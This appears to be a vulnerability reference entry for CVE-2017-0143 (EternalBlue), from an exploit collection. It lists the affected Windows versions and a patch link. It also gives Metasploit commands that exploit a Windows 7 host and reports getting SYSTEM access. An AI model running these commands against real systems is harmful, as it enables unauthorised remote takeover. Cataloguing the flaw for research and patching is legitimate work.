### CVE-2017-0143

#### Describe

The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.


#### ImpactVersion

| Product             | CPU Architecture | Version | Update | Tested             |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10          | x86/x64          |         |        |                    |
| Windows 10          | x86/x64          | 1511    |        |                    |
| Windows 10          | x86/x64          | 1607    |        |                    |
| Windows 7           | x86/x64          |         | SP1    | &#10004; |
| Windows 8.1         | x86/x64          |         |        |                    |
| Windows Rt 8.1      |                  |         |        |                    |
| Windows Server 2008 | x86/x64          |         | SP2    |                    |
| Windows Server 2008 | x86/x64          | R2      | SP1    |                    |
| Windows Server 2012 |                  | R2      |        |                    |
| Windows Server 2012 |                  |         |        |                    |
| Windows Server 2016 |                  |         |        |                    |
| Windows Vista       | x86/x64          |         | SP2    |                    |

#### Patch

```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143
```

#### Utilization

Directly use MSF to make it easy and fast，Test system Windows 7 SP1 x64

```
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.0.128
run
```

![image-20200818114043309](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0143_msf_1.png)

And the permissions are SYSTEM

![image-20200818114925926](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0143_msf_2.png)


#### Analyze
- https://www.anquanke.com/post/id/86270
- https://github.com/worawit/MS17-010/blob/master/BUG.txt
- https://yi0934.github.io/2019/04/08/CVE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/ms17-010/
- https://cy2cs.top/2020/08/22/%E3%80%90owva%E3%80%91%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
- https://paper.seebug.org/280/